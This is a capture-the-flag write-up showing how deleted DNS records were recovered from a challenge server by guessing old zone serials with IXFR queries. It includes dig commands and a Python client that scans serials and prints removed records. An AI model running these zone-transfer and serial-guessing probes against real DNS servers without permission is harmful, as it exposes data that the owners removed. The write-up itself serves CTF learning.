Category: Misc (DNS / Recon)
Difficulty: Medium
1. Challenge Overview
The challenge provided a DNS server at 52.59.124.14:5054 for the domain flag.ctf.nullcon.net. The author hinted that the flag was hidden and challenged me to “show that I know all about DNS.”
2. Vulnerability Analysis
Step 1: Initial Reconnaissance
I started by checking for the flag in standard TXT records at the apex.
dig @52.59.124.14 -p 5054 TXT flag.ctf.nullcon.net
Result: flag.ctf.nullcon.net. 300 IN TXT "The flag was removed."
The server claimed the flag was gone, but a hand-written message in place of a plain empty answer or NXDOMAIN suggested the record had been replaced rather than the name deleted, and that the flag might still be reachable through less common DNS features.
Step 2: Failed Enumeration Attempts
I attempted several standard DNS enumeration techniques, all of which were unsuccessful:
- Zone Transfer (AXFR): dig @52.59.124.14 -p 5054 AXFR flag.ctf.nullcon.net
  Result: ; Transfer failed.
- DNSSEC Walking: Querying non-existent names with +dnssec did not return NSEC records, so the zone was not "walkable" the way the previous challenge's zone was (it was either unsigned or not NSEC-signed).
- Chaos Class (CH): Querying CH TXT flag.ctf.nullcon.net returned the same "flag was removed" message.
- EDNS Client Subnet: Testing with +subnet=127.0.0.1 and other subnets did not change the output.
Step 3: Investigating Zone History (IXFR)
I checked the SOA (Start of Authority) record to see the serial number:
dig @52.59.124.14 -p 5054 SOA flag.ctf.nullcon.net
Result: Serial was 1500.
A serial of 1500 suggested the zone had been updated many times (the serial is normally bumped on every change). IXFR (Incremental Zone Transfer, RFC 1995) asks the server for every change made after the serial the client claims to hold, so I tested it with serial 1499 to see the changes between version 1499 and 1500:
dig @52.59.124.14 -p 5054 IXFR=1499 flag.ctf.nullcon.net
Discovery: The response showed the admin explicitly removing a record:
flag.ctf.nullcon.net. 300 IN TXT "Phew, removed the flag before anyone could get it"
3. Developing the Exploit
Since the flag was removed in the step from 1499 to 1500, the record must have existed in an earlier version of the zone, and the server evidently still kept a journal of old changes that IXFR would replay. In CTF environments, specific "leet" numbers are often used for significant updates, so I targeted serial 1337 to see the state of the zone at that point in its history.
4. The Solution Script (Manual Command)
The winning command requested the incremental changes starting from version 1337.
dig @52.59.124.14 -p 5054 IXFR=1337 flag.ctf.nullcon.net
5. The Winning Payload
The server responded with the diff starting from serial 1337, revealing the original record:
flag.ctf.nullcon.net. 300 IN SOA ns.ctf.nullcon.net. admin.ctf.nullcon.net. 1337 3600 1800 604800 86400
flag.ctf.nullcon.net. 300 IN A 10.13.37.1
flag.ctf.nullcon.net. 300 IN TXT "Update #1337: ENO{1337_1ncr3m3nt4l_z0n3_tr4nsf3r_m4st3r_8f9a2c1d}"
6. Result
- Flag: ENO{1337_1ncr3m3nt4l_z0n3_tr4nsf3r_m4st3r_8f9a2c1d}
- Lessons Learned: Authoritative servers that support IXFR keep a journal of zone changes. A record that has been deleted may still be retrievable with IXFR if the attacker can guess or brute-force the serial of an earlier version, because the answer replays every deletion and addition between that serial and the current one. Two things to watch when trying this elsewhere: a serial the server cannot serve incrementally normally falls back to a full AXFR (which this server refused), and a response carrying only the current SOA means the server has no changes after that serial.
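To make the serial-guessing step concrete, here is an added example (my own code, not part of the original writeup or the challenge): a minimal IXFR client on the Python standard library only. It shows what dig hides, namely that the guessed serial travels inside an SOA record in the authority section of the query (RFC 1995), reads the TCP-framed answer, and splits it into per-serial deleted/added sets so that removed records stand out. The host, port and zone are the challenge's; the function names, the scan range in the main block and the placeholder MNAME/RNAME in the client SOA are this example's own choices.

```python
# Added example: hand-rolled IXFR client (RFC 1995) for serial guessing.
# Not from the original writeup; helper names and scan range are assumptions.
import socket
import struct

A, SOA, TXT, IXFR = 1, 6, 16, 251
HOST, PORT, ZONE = "52.59.124.14", 5054, "flag.ctf.nullcon.net"

def encode_name(name):
    """Dotted name -> DNS wire labels (no compression)."""
    out = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return out + b"\x00"

def decode_name(msg, off):
    """Read a (possibly compressed) name at msg[off]; return (name, offset after it)."""
    labels, end = [], None
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                       # compression pointer
            end = off + 2 if end is None else end
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode())
        off += ln
    return ".".join(labels) + ".", (off if end is None else end)

def build_ixfr_query(zone, serial, txid=0x1337):
    """IXFR query: the serial we claim to hold rides in an SOA in the authority
    section, so the server answers with every change made after that version."""
    hdr = struct.pack("!HHHHHH", txid, 0, 1, 0, 1, 0)   # 1 question, 1 authority RR
    question = encode_name(zone) + struct.pack("!HH", IXFR, 1)
    # only the serial matters to the server; MNAME/RNAME/timers are placeholders
    rdata = encode_name("ns.") + encode_name("admin.") + struct.pack("!IIIII", serial, 0, 0, 0, 0)
    authority = encode_name(zone) + struct.pack("!HHIH", SOA, 1, 0, len(rdata)) + rdata
    return hdr + question + authority

def parse_rr(msg, off):
    """Return ((name, type, value), next_offset). value: SOA serial, first TXT
    string, dotted quad for A, hex for anything else."""
    name, off = decode_name(msg, off)
    rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
    off += 10
    rdata = msg[off:off + rdlen]
    if rtype == SOA:
        _, o = decode_name(msg, off)                # MNAME
        _, o = decode_name(msg, o)                  # RNAME
        value = struct.unpack("!I", msg[o:o + 4])[0]
    elif rtype == TXT:
        value = rdata[1:1 + rdata[0]].decode(errors="replace")
    elif rtype == A:
        value = ".".join(str(b) for b in rdata)
    else:
        value = rdata.hex()
    return (name, rtype, value), off + rdlen

def parse_message(msg):
    """Return (flags, [rr, ...]) over the answer, authority and additional sections."""
    _, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(msg, off)
        off += 4                                    # QTYPE + QCLASS
    rrs = []
    for _ in range(an + ns + ar):
        rr, off = parse_rr(msg, off)
        rrs.append(rr)
    return flags, rrs

def split_ixfr(rrs):
    """Split an IXFR answer into [(old_serial, deleted, new_serial, added), ...].
    Wire layout: SOA(current), then per step SOA(old) <deleted> SOA(new) <added>,
    closed by SOA(current). Fewer than three SOAs means no incremental history
    (a lone SOA: nothing newer than our serial; two: a full-zone AXFR fallback)."""
    soa_at = [i for i, rr in enumerate(rrs) if rr[1] == SOA]
    if len(soa_at) < 3:
        return []
    steps, inner = [], soa_at[1:-1]
    for j in range(0, len(inner), 2):
        old_i, new_i = inner[j], inner[j + 1]
        nxt = inner[j + 2] if j + 2 < len(inner) else soa_at[-1]
        steps.append((rrs[old_i][2], rrs[old_i + 1:new_i], rrs[new_i][2], rrs[new_i + 1:nxt]))
    return steps

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed")
        buf += chunk
    return buf

def query_ixfr(host, port, zone, serial, timeout=5):
    """Send one IXFR over TCP; collect RRs until the closing SOA or the server goes away."""
    q, rrs = build_ixfr_query(zone, serial), []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(q)) + q)    # TCP DNS is length-prefixed
        while True:
            try:
                n = struct.unpack("!H", recv_exact(s, 2))[0]
                _, part = parse_message(recv_exact(s, n))
            except (ConnectionError, socket.timeout):
                break
            rrs.extend(part)
            serials = [rr[2] for rr in rrs if rr[1] == SOA]
            if not part or not serials:             # REFUSED or non-transfer answer
                break
            # finished when the last RR repeats the opening SOA: 3 copies for IXFR, 2 for AXFR
            if rrs[-1][1] == SOA and rrs[-1][2] == serials[0] and (
                    len(serials) == 2 or serials.count(serials[0]) == 3):
                break
    return rrs

if __name__ == "__main__":
    # walk guessed serials and print every record the journal says was deleted
    seen = set()
    for serial in range(1499, 1336, -1):            # assumed scan range
        for old, deleted, new, _ in split_ixfr(query_ixfr(HOST, PORT, ZONE, serial)):
            for rr in deleted:
                if rr not in seen:
                    seen.add(rr)
                    print(f"{old}->{new} removed {rr[0]} type {rr[1]}: {rr[2]}")
```

Strictly, an IXFR from one old serial should already replay every later change, so the scan loop only earns its keep when a server answers some serials and not others; run it with python3 and compare the 1337 hit against the dig output above.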